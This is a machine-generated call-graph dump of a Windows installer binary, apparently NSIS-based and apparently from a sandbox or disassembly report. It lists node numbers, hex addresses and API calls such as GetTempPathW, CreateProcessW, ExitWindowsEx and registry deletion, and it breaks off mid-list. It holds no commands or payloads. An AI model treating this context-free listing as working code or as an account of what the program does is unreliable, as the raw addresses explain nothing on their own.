4468->4476 4469->4461 4472 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4469->4472 4470->4461 4471 406651 FreeLibrary 4480 40662a 4471->4480 4472->4476 4474 4064ce FreeLibrary GlobalFree 4473->4474 4473->4476 4482 4064ea 4473->4482 4474->4461 4475 4066ea 4478 4066ef CloseHandle FreeLibrary 4475->4478 4476->4471 4476->4480 4477 4064fc lstrcpyW OpenProcess 4479 40654f CloseHandle CharUpperW lstrcmpW 4477->4479 4477->4482 4481 406704 CloseHandle 4478->4481 4479->4476 4479->4482 4480->4475 4483 406685 lstrcmpW 4480->4483 4484 4066b6 CloseHandle 4480->4484 4485 4066d4 CloseHandle 4480->4485 4481->4478 4482->4467 4482->4477 4482->4479 4483->4480 4483->4481 4484->4480 4485->4470 4486->4457 4487->4460 4488 407752 4492 407344 4488->4492 4489 407c6d 4490 4073c2 GlobalFree 4491 4073cb GlobalAlloc 4490->4491 4491->4489 4491->4492 4492->4489 4492->4490 4492->4491 4492->4492 4493 407443 GlobalAlloc 4492->4493 4494 40743a GlobalFree 4492->4494 4493->4489 4493->4492 4494->4493 4495 401dd3 4496 401446 18 API calls 4495->4496 4497 401dda 4496->4497 4498 401446 18 API calls 4497->4498 4499 4018d3 4498->4499 4507 402e55 4508 40145c 18 API calls 4507->4508 4509 402e63 4508->4509 4510 402e79 4509->4510 4511 40145c 18 API calls 4509->4511 4512 405e30 2 API calls 4510->4512 4511->4510 4513 402e7f 4512->4513 4537 405e50 GetFileAttributesW CreateFileW 4513->4537 4515 402e8c 4516 402f35 4515->4516 4517 402e98 GlobalAlloc 4515->4517 4520 4062a3 11 API calls 4516->4520 4518 402eb1 4517->4518 4519 402f2c CloseHandle 4517->4519 4538 403368 SetFilePointer 4518->4538 4519->4516 4522 402f45 4520->4522 4524 402f50 DeleteFileW 4522->4524 4525 402f63 4522->4525 4523 402eb7 4527 403336 ReadFile 4523->4527 4524->4525 4539 401435 4525->4539 4528 402ec0 GlobalAlloc 4527->4528 4529 402ed0 4528->4529 4530 402f04 WriteFile GlobalFree 4528->4530 4531 40337f 37 API calls 4529->4531 4532 40337f 37 API calls 4530->4532 4536 402edd 4531->4536 4533 402f29 4532->4533 4533->4519 4535 402efb GlobalFree 4535->4530 4536->4535 4537->4515 4538->4523 4540 404f72 25 API calls 4539->4540 4541 401443 4540->4541 4542 401cd5 4543 401446 18 API calls 4542->4543 4544 401cdd 4543->4544 4545 401446 18 API calls 4544->4545 4546 401ce8 4545->4546 4547 40145c 18 API calls 4546->4547 4548 401cf1 4547->4548 4549 401d07 lstrlenW 4548->4549 4550 401d43 4548->4550 4551 401d11 4549->4551 4551->4550 4555 406009 lstrcpynW 4551->4555 4553 401d2c 4553->4550 4554 401d39 lstrlenW 4553->4554 4554->4550 4555->4553 4556 403cd6 4557 403ce1 4556->4557 4558 403ce5 4557->4558 4559 403ce8 GlobalAlloc 4557->4559 4559->4558 4560 402cd7 4561 401446 18 API calls 4560->4561 4564 402c64 4561->4564 4562 402d99 4563 402d17 ReadFile 4563->4564 4564->4560 4564->4562 4564->4563 4565 402dd8 4566 402ddf 4565->4566 4567 4030e3 4565->4567 4568 402de5 FindClose 4566->4568 4568->4567 4569 401d5c 4570 40145c 18 API calls 4569->4570 4571 401d63 4570->4571 4572 40145c 18 API calls 4571->4572 4573 401d6c 4572->4573 4574 401d73 lstrcmpiW 4573->4574 4575 401d86 lstrcmpW 4573->4575 4576 401d79 4574->4576 4575->4576 4577 401c99 4575->4577 4576->4575 4576->4577 4279 407c5f 4280 407344 4279->4280 4281 4073c2 GlobalFree 4280->4281 4282 4073cb GlobalAlloc 4280->4282 4283 407c6d 4280->4283 4284 407443 GlobalAlloc 4280->4284 4285 40743a GlobalFree 4280->4285 4281->4282 4282->4280 4282->4283 4284->4280 4284->4283 4285->4284 4578 404363 4579 404373 4578->4579 4580 40439c 4578->4580 4582 403d3f 19 API calls 4579->4582 4581 403dca 8 API calls 4580->4581 4583 4043a8 4581->4583 4584 404380 SetDlgItemTextW 4582->4584 4584->4580 4585 4027e3 4586 4027e9 4585->4586 4587 4027f2 4586->4587 4588 402836 4586->4588 4601 401553 4587->4601 4589 40145c 18 API calls 4588->4589 4591 40283d 4589->4591 4593 4062a3 11 API calls 4591->4593 4592 4027f9 4594 40145c 18 API calls 4592->4594 4599 401a13 4592->4599 4595 40284d 4593->4595 4596 40280a RegDeleteValueW 4594->4596 4605 40149d RegOpenKeyExW 4595->4605 4597 4062a3 11 API calls 4596->4597 4600 40282a RegCloseKey 4597->4600 4600->4599 4602 401563 4601->4602 4603 40145c 18 API calls 4602->4603 4604 401589 RegOpenKeyExW 4603->4604 4604->4592 4611 401515 4605->4611 4613 4014c9 4605->4613 4606 4014ef RegEnumKeyW 4607 401501 RegCloseKey 4606->4607 4606->4613 4608 4062fc 3 API calls 4607->4608 4610 401511 4608->4610 4609 401526 RegCloseKey 4609->4611 4610->4611 4614 401541 RegDeleteKeyW 4610->4614 4611->4599 4612 40149d 3 API calls 4612->4613 4613->4606 4613->4607 4613->4609 4613->4612 4614->4611 4615 403f64 4616 403f90 4615->4616 4617 403f74 4615->4617 4619 403fc3 4616->4619 4620 403f96 SHGetPathFromIDListW 4616->4620 4626 405c84 GetDlgItemTextW 4617->4626 4622 403fad SendMessageW 4620->4622 4623 403fa6 4620->4623 4621 403f81 SendMessageW 4621->4616 4622->4619 4624 40141d 80 API calls 4623->4624 4624->4622 4626->4621 4627 402ae4 4628 402aeb 4627->4628 4629 4030e3 4627->4629 4630 402af2 CloseHandle 4628->4630 4630->4629 4631 402065 4632 401446 18 API calls 4631->4632 4633 40206d 4632->4633 4634 401446 18 API calls 4633->4634 4635 402076 GetDlgItem 4634->4635 4636 4030dc 4635->4636 4637 4030e3 4636->4637 4639 405f51 wsprintfW 4636->4639 4639->4637 4640 402665 4641 40145c 18 API calls 4640->4641 4642 40266b 4641->4642 4643 40145c 18 API calls 4642->4643 4644 402674 4643->4644 4645 40145c 18 API calls 4644->4645 4646 40267d 4645->4646 4647 4062a3 11 API calls 4646->4647 4648 40268c 4647->4648 4649 4062d5 2 API calls 4648->4649 4650 402695 4649->4650 4651 4026a6 lstrlenW lstrlenW 4650->4651 4652 404f72 25 API calls 4650->4652 4655 4030e3 4650->4655 4653 404f72 25 API calls 4651->4653 4652->4650 4654 4026e8 SHFileOperationW 4653->4654 4654->4650 4654->4655 4663 401c69 4664 40145c 18 API calls 4663->4664 4665 401c70 4664->4665 4666 4062a3 11 API calls 4665->4666 4667 401c80 4666->4667 4668 405ca0 MessageBoxIndirectW 4667->4668 4669 401a13 4668->4669 4677 402f6e 4678 402f72 4677->4678 4679 402fae 4677->4679 4680 4062a3 11 API calls 4678->4680 4681 40145c 18 API calls 4679->4681 4682 402f7d 4680->4682 4687 402f9d 4681->4687 4683 4062a3 11 API calls 4682->4683 4684 402f90 4683->4684 4685 402fa2 4684->4685 4686 402f98 4684->4686 4689 4060e7 9 API calls 4685->4689 4688 403e74 5 API calls 4686->4688 4688->4687 4689->4687 4690 4023f0 4691 402403 4690->4691 4692 4024da 4690->4692 4693 40145c 18 API calls 4691->4693 4694 404f72 25 API calls 4692->4694 4695 40240a 4693->4695 4700 4024f1 4694->4700 4696 40145c 18 API calls 4695->4696 4697 402413 4696->4697 4698 402429 LoadLibraryExW 4697->4698 4699 40241b GetModuleHandleW 4697->4699 4701 40243e 4698->4701 4702 4024ce 4698->4702 4699->4698 4699->4701 4714 406365 GlobalAlloc WideCharToMultiByte 4701->4714 4703 404f72 25 API calls 4702->4703 4703->4692 4705 402449 4706 40248c 4705->4706 4707 40244f 4705->4707 4708 404f72 25 API calls 4706->4708 4710 401435 25 API calls 4707->4710 4712 40245f 4707->4712 4709 402496 4708->4709 4711 4062a3 11 API calls 4709->4711 4710->4712 4711->4712 4712->4700 4713 4024c0 FreeLibrary 4712->4713 4713->4700 4715 406390 GetProcAddress 4714->4715 4716 40639d GlobalFree 4714->4716 4715->4716 4716->4705 4717 402df3 4718 402dfa 4717->4718 4720 4019ec 4717->4720 4719 402e07 FindNextFileW 4718->4719 4719->4720 4721 402e16 4719->4721 4723 406009 lstrcpynW 4721->4723 4723->4720 4076 402175 4077 401446 18 API calls 4076->4077 4078 40217c 4077->4078 4079 401446 18 API calls 4078->4079 4080 402186 4079->4080 4081 4062a3 11 API calls 4080->4081 4085 402197 4080->4085 4081->4085 4082 4021aa EnableWindow 4084 4030e3 4082->4084 4083 40219f ShowWindow 4083->4084 4085->4082 4085->4083 4731 404077 4732 404081 4731->4732 4733 404084 lstrcpynW lstrlenW 4731->4733 4732->4733 4102 405479 4103 405491 4102->4103 4104 4055cd 4102->4104 4103->4104 4105 40549d 4103->4105 4106 40561e 4104->4106 4107 4055de GetDlgItem GetDlgItem 4104->4107 4108 4054a8 SetWindowPos 4105->4108 4109 4054bb 4105->4109 4111 405678 4106->4111 4119 40139d 80 API calls 4106->4119 4110 403d3f 19 API calls 4107->4110 4108->4109 4113 4054c0 ShowWindow 4109->4113 4114 4054d8 4109->4114 4115 405608 SetClassLongW 4110->4115 4112 403daf SendMessageW 4111->4112 4132 4055c8 4111->4132 4142 40568a 4112->4142 4113->4114 4116 4054e0 DestroyWindow 4114->4116 4117 4054fa 4114->4117 4118 40141d 80 API calls 4115->4118 4171 4058dc 4116->4171 4120 405510 4117->4120 4121 4054ff SetWindowLongW 4117->4121 4118->4106 4122 405650 4119->4122 4125 4055b9 4120->4125 4126 40551c GetDlgItem 4120->4126 4121->4132 4122->4111 4127 405654 SendMessageW 4122->4127 4123 40141d 80 API calls 4123->4142 4124 4058de DestroyWindow KiUserCallbackDispatcher 4124->4171 4181 403dca 4125->4181 4130 40554c 4126->4130 4131 40552f SendMessageW IsWindowEnabled 4126->4131 4127->4132 4129 40590d ShowWindow 4129->4132 4134 405559 4130->4134 4135 4055a0 SendMessageW 4130->4135 4136 40556c 4130->4136 4145 405551 4130->4145 4131->4130 4131->4132 4133 406805 18 API calls 4133->4142 4134->4135 4134->4145 4135->4125 4139 405574 4136->4139 4140 405589 4136->4140 4138 403d3f 19 API calls 4138->4142 4143 40141d 80 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4141 405587 4141->4125 4142->4123 4142->4124 4142->4132 4142->4133 4142->4138 4162 40581e DestroyWindow 4142->4162 4172 403d3f 4142->4172 4143->4145 4146 405590 4144->4146 4178 403d18 4145->4178 4146->4125 4146->4145 4148 405705 GetDlgItem 4149 405723 ShowWindow KiUserCallbackDispatcher 4148->4149 4150 40571a 4148->4150 4175 403d85 KiUserCallbackDispatcher 4149->4175 4150->4149 4152 40574d EnableWindow 4155 405761 4152->4155 4153 405766 GetSystemMenu EnableMenuItem SendMessageW 4154 405796 SendMessageW 4153->4154 4153->4155 4154->4155 4155->4153 4176 403d98 SendMessageW 4155->4176 4177 406009 lstrcpynW 4155->4177 4158 4057c4 lstrlenW 4159 406805 18 API calls 4158->4159 4160 4057da SetWindowTextW 4159->4160 4161 40139d 80 API calls 4160->4161 4161->4142 4163 405838 CreateDialogParamW 4162->4163 4162->4171 4164 40586b 4163->4164 4163->4171 4165 403d3f 19 API calls 4164->4165 4166 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4165->4166 4167 40139d 80 API calls 4166->4167 4168 4058bc 4167->4168 4168->4132 4169 4058c4 ShowWindow 4168->4169 4170 403daf SendMessageW 4169->4170 4170->4171 4171->4129 4171->4132 4173 406805 18 API calls 4172->4173 4174 403d4a SetDlgItemTextW 4173->4174 4174->4148 4175->4152 4176->4155 4177->4158 4179 403d25 SendMessageW 4178->4179 4180 403d1f 4178->4180 4179->4141 4180->4179 4182 403ddf GetWindowLongW 4181->4182 4192 403e68 4181->4192 4183 403df0 4182->4183 4182->4192 4184 403e02 4183->4184 4185 403dff GetSysColor 4183->4185 4186 403e12 SetBkMode 4184->4186 4187 403e08 SetTextColor 4184->4187 4185->4184 4188 403e30 4186->4188 4189 403e2a GetSysColor 4186->4189 4187->4186 4190 403e41 4188->4190 4191 403e37 SetBkColor 4188->4191 4189->4188 4190->4192 4193 403e54 DeleteObject 4190->4193 4194 403e5b CreateBrushIndirect 4190->4194 4191->4190 4192->4132 4193->4194 4194->4192 4734 4020f9 GetDC GetDeviceCaps 4735 401446 18 API calls 4734->4735 4736 402116 MulDiv 4735->4736 4737 401446 18 API calls 4736->4737 4738 40212c 4737->4738 4739 406805 18 API calls 4738->4739 4740 402165 CreateFontIndirectW 4739->4740 4741 4030dc 4740->4741 4742 4030e3 4741->4742 4744 405f51 wsprintfW 4741->4744 4744->4742 4745 4024fb 4746 40145c 18 API calls 4745->4746 4747 402502 4746->4747 4748 40145c 18 API calls 4747->4748 4749 40250c 4748->4749 4750 40145c 18 API calls 4749->4750 4751 402515 4750->4751 4752 40145c 18 API calls 4751->4752 4753 40251f 4752->4753 4754 40145c 18 API calls 4753->4754 4755 402529 4754->4755 4756 40253d 4755->4756 4757 40145c 18 API calls 4755->4757 4758 4062a3 11 API calls 4756->4758 4757->4756 4759 40256a CoCreateInstance 4758->4759 4760 40258c 4759->4760 4761 40497c GetDlgItem GetDlgItem 4762 4049d2 7 API calls 4761->4762 4767 404bea 4761->4767 4763 404a76 DeleteObject 4762->4763 4764 404a6a SendMessageW 4762->4764 4765 404a81 4763->4765 4764->4763 4768 404ab8 4765->4768 4770 406805 18 API calls 4765->4770 4766 404ccf 4769 404d74 4766->4769 4774 404bdd 4766->4774 4779 404d1e SendMessageW 4766->4779 4767->4766 4777 40484e 5 API calls 4767->4777 4790 404c5a 4767->4790 4773 403d3f 19 API calls 4768->4773 4771 404d89 4769->4771 4772 404d7d SendMessageW 4769->4772 4776 404a9a SendMessageW SendMessageW 4770->4776 4781 404da2 4771->4781 4782 404d9b ImageList_Destroy 4771->4782 4792 404db2 4771->4792 4772->4771 4778 404acc 4773->4778 4780 403dca 8 API calls 4774->4780 4775 404cc1 SendMessageW 4775->4766 4776->4765 4777->4790 4783 403d3f 19 API calls 4778->4783 4779->4774 4785 404d33 SendMessageW 4779->4785 4786 404f6b 4780->4786 4787 404dab GlobalFree 4781->4787 4781->4792 4782->4781 4788 404add 4783->4788 4784 404f1c 4784->4774 4793 404f31 ShowWindow GetDlgItem ShowWindow 4784->4793 4789 404d46 4785->4789 4787->4792 4791 404baa GetWindowLongW SetWindowLongW 4788->4791 4800 404ba4 4788->4800 4803 404b39 SendMessageW 4788->4803 4804 404b67 SendMessageW 4788->4804 4805 404b7b SendMessageW 4788->4805 4799 404d57 SendMessageW 4789->4799 4790->4766 4790->4775 4794 404bc4 4791->4794 4792->4784 4795 404de4 4792->4795 4798 40141d 80 API calls 4792->4798 4793->4774 4796 404be2 4794->4796 4797 404bca ShowWindow 4794->4797 4808 404e12 SendMessageW 4795->4808 4811 404e28 4795->4811 4813 403d98 SendMessageW 4796->4813 4812 403d98 SendMessageW 4797->4812 4798->4795 4799->4769 4800->4791 4800->4794 4803->4788 4804->4788 4805->4788 4806 404ef3 InvalidateRect 4806->4784 4807 404f09 4806->4807 4814 4043ad 4807->4814 4808->4811 4810 404ea1 SendMessageW SendMessageW 4810->4811 4811->4806 4811->4810 4812->4774 4813->4767 4815 4043cd 4814->4815 4816 406805 18 API calls 4815->4816 4817 40440d 4816->4817 4818 406805 18 API calls 4817->4818 4819 404418 4818->4819 4820 406805 18 API calls 4819->4820 4821 404428 lstrlenW wsprintfW SetDlgItemTextW 4820->4821 4821->4784 4822 4026fc 4823 401ee4 4822->4823 4825 402708 4822->4825 4823->4822 4824 406805 18 API calls 4823->4824 4824->4823 4274 4019fd 4275 40145c 18 API calls 4274->4275 4276 401a04 4275->4276 4277 405e7f 2 API calls 4276->4277 4278 401a0b 4277->4278 4826 4022fd 4827 40145c 18 API calls 4826->4827 4828 402304 GetFileVersionInfoSizeW 4827->4828 4829 40232b GlobalAlloc 4828->4829 4833 4030e3 4828->4833 4830 40233f GetFileVersionInfoW 4829->4830 4829->4833 4831 402350 VerQueryValueW 4830->4831 4832 402381 GlobalFree 4830->4832 4831->4832 4835 402369 4831->4835 4832->4833 4839 405f51 wsprintfW 4835->4839 4837 402375 4840 405f51 wsprintfW 4837->4840 4839->4837 4840->4832 4841 402afd 4842 40145c 18 API calls 4841->4842 4843 402b04 4842->4843 4848 405e50 GetFileAttributesW CreateFileW 4843->4848 4845 402b10 4846 4030e3 4845->4846 4849 405f51 wsprintfW 4845->4849 4848->4845 4849->4846 4850 4029ff 4851 401553 19 API calls 4850->4851 4852 402a09 4851->4852 4853 40145c 18 API calls 4852->4853 4854 402a12 4853->4854 4855 402a1f RegQueryValueExW 4854->4855 4857 401a13 4854->4857 4856 402a3f 4855->4856 4860 402a45 4855->4860 4856->4860 4861 405f51 wsprintfW 4856->4861 4859 4029e4 RegCloseKey 4859->4857 4860->4857 4860->4859 4861->4860 4862 401000 4863 401037 BeginPaint GetClientRect 4862->4863 4864 40100c DefWindowProcW 4862->4864 4866 4010fc 4863->4866 4867 401182 4864->4867 4868 401073 CreateBrushIndirect FillRect DeleteObject 4866->4868 4869 401105 4866->4869 4868->4866 4870 401170 EndPaint 4869->4870 4871 40110b CreateFontIndirectW 4869->4871 4870->4867 4871->4870 4872 40111b 6 API calls 4871->4872 4872->4870 4873 401f80 4874 401446 18 API calls 4873->4874 4875 401f88 4874->4875 4876 401446 18 API calls 4875->4876 4877 401f93 4876->4877 4878 401fa3 4877->4878 4879 40145c 18 API calls 4877->4879 4880 401fb3 4878->4880 4881 40145c 18 API calls 4878->4881 4879->4878 4882 402006 4880->4882 4883 401fbc 4880->4883 4881->4880 4885 40145c 18 API calls 4882->4885 4884 401446 18 API calls 4883->4884 4887 401fc4 4884->4887 4886 40200d 4885->4886 4888 40145c 18 API calls 4886->4888 4889 401446 18 API calls 4887->4889 4890 402016 FindWindowExW 4888->4890 4891 401fce 4889->4891 4895 402036 4890->4895 4892 401ff6 SendMessageW 4891->4892 4893 401fd8 SendMessageTimeoutW 4891->4893 4892->4895 4893->4895 4894 4030e3 4895->4894 4897 405f51 wsprintfW 4895->4897 4897->4894 4898 402880 4899 402884 4898->4899 4900 40145c 18 API calls 4899->4900 4901 4028a7 4900->4901 4902 40145c 18 API calls 4901->4902 4903 4028b1 4902->4903 4904 4028ba RegCreateKeyExW 4903->4904 4905 4028e8 4904->4905 4912 4029ef 4904->4912 4906 402934 4905->4906 4907 40145c 18 API calls 4905->4907 4908 402963 4906->4908 4911 401446 18 API calls 4906->4911 4910 4028fc lstrlenW 4907->4910 4909 4029ae RegSetValueExW 4908->4909 4913 40337f 37 API calls 4908->4913 4916 4029c6 RegCloseKey 4909->4916 4917 4029cb 4909->4917 4914 402918 4910->4914 4915 40292a 4910->4915 4918 402947 4911->4918 4919 40297b 4913->4919 4920 4062a3 11 API calls 4914->4920 4921 4062a3 11 API calls 4915->4921 4916->4912 4922 4062a3 11 API calls 4917->4922 4923 4062a3 11 API calls 4918->4923 4929 406224 4919->4929 4925 402922 4920->4925 4921->4906 4922->4916 4923->4908 4925->4909 4928 4062a3 11 API calls 4928->4925 4930 406247 4929->4930 4931 40628a 4930->4931 4932 40625c wsprintfW 4930->4932 4933 402991 4931->4933 4934 406293 lstrcatW 4931->4934 4932->4931 4932->4932 4933->4928 4934->4933 4935 402082 4936 401446 18 API calls 4935->4936 4937 402093 SetWindowLongW 4936->4937 4938 4030e3 4937->4938 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3709 40141d 3520->3709 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3701 406c68 3529->3701 3706 405c3f CreateProcessW 3529->3706 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3712 406038 3546->3712 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3721 406722 lstrlenW CharPrevW 3549->3721 3728 405e50 GetFileAttributesW CreateFileW 3554->3728 3556 4035c7 3577 4035d7 3556->3577 3729 406009 lstrcpynW 3556->3729 3558 4035ed 3730 406751 lstrlenW 3558->3730 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3737 4032d2 3563->3737 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3771 403368 SetFilePointer 3565->3771 3748 403368 SetFilePointer 3567->3748 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3749 40337f 3571->3749 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3735 403336 ReadFile 3576->3735 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3812 405f51 wsprintfW 3585->3812 3813 405ed3 RegOpenKeyExW 3586->3813 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3795 403e95 3592->3795 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3819 403e74 3602->3819 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3818 406009 lstrcpynW 3620->3818 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3804 405047 OleInitialize 3626->3804 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3964 403c83 3640->3964 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4021 406009 lstrcpynW 3651->4021 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4022 405e50 GetFileAttributesW CreateFileW 3674->4022 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3698 406812 3683->3698 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4025 406009 lstrcpynW 3684->4025 3685->3527 3685->3529 3687 4068d3 GetVersion 3687->3698 3688 406a46 lstrlenW 3688->3698 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3698 3693 406952 GetSystemDirectoryW 3693->3698 3694 406965 GetWindowsDirectoryW 3694->3698 3695 406038 5 API calls 3695->3698 3696 406805 10 API calls 3696->3698 3697 4069df lstrcatW 3697->3698 3698->3684 3698->3687 3698->3688 3698->3689 3698->3692 3698->3693 3698->3694 3698->3695 3698->3696 3698->3697 3699 406999 SHGetSpecialFolderLocation 3698->3699 4023 405f51 wsprintfW 3698->4023 4024 406009 lstrcpynW 3698->4024 3699->3698 3700 4069b1 SHGetPathFromIDListW CoTaskMemFree 3699->3700 3700->3698 3702 4062fc 3 API calls 3701->3702 3703 406c6f 3702->3703 3705 406c90 3703->3705 4026 406a99 lstrcpyW 3703->4026 3705->3529 3707 405c7a 3706->3707 3708 405c6e CloseHandle 3706->3708 3707->3529 3708->3707 3710 40139d 80 API calls 3709->3710 3711 401432 3710->3711 3711->3495 3718 406045 3712->3718 3713 4060bb 3714 4060c1 CharPrevW 3713->3714 3716 4060e1 3713->3716 3714->3713 3715 4060ae CharNextW 3715->3713 3715->3718 3716->3549 3717 405d06 CharNextW 3717->3718 3718->3713 3718->3715 3718->3717 3719 40609a CharNextW 3718->3719 3720 4060a9 CharNextW 3718->3720 3719->3718 3720->3715 3722 4037ea CreateDirectoryW 3721->3722 3723 40673f lstrcatW 3721->3723 3724 405e7f 3722->3724 3723->3722 3725 405e8c GetTickCount GetTempFileNameW 3724->3725 3726 405ec2 3725->3726 3727 4037fe 3725->3727 3726->3725 3726->3727 3727->3475 3728->3556 3729->3558 3731 406760 3730->3731 3732 4035f3 3731->3732 3733 406766 CharPrevW 3731->3733 3734 406009 lstrcpynW 3732->3734 3733->3731 3733->3732 3734->3562 3736 403357 3735->3736 3736->3576 3738 4032f3 3737->3738 3739 4032db 3737->3739 3742 403303 GetTickCount 3738->3742 3743 4032fb 3738->3743 3740 4032e4 DestroyWindow 3739->3740 3741 4032eb 3739->3741 3740->3741 3741->3565 3745 403311 CreateDialogParamW ShowWindow 3742->3745 3746 403334 3742->3746 3772 406332 3743->3772 3745->3746 3746->3565 3748->3571 3751 403398 3749->3751 3750 4033c3 3753 403336 ReadFile 3750->3753 3751->3750 3794 403368 SetFilePointer 3751->3794 3754 4033ce 3753->3754 3755 4033e7 GetTickCount 3754->3755 3756 403518 3754->3756 3758 4033d2 3754->3758 3768 4033fa 3755->3768 3757 40351c 3756->3757 3762 403540 3756->3762 3759 403336 ReadFile 3757->3759 3758->3580 3759->3758 3760 403336 ReadFile 3760->3762 3761 403336 ReadFile 3761->3768 3762->3758 3762->3760 3763 40355f WriteFile 3762->3763 3763->3758 3764 403574 3763->3764 3764->3758 3764->3762 3766 40345c GetTickCount 3766->3768 3767 403485 MulDiv wsprintfW 3783 404f72 3767->3783 3768->3758 3768->3761 3768->3766 3768->3767 3770 4034c9 WriteFile 3768->3770 3776 407312 3768->3776 3770->3758 3770->3768 3771->3572 3773 40634f PeekMessageW 3772->3773 3774 406345 DispatchMessageW 3773->3774 3775 403301 3773->3775 3774->3773 3775->3565 3777 407332 3776->3777 3778 40733a 3776->3778 3777->3768 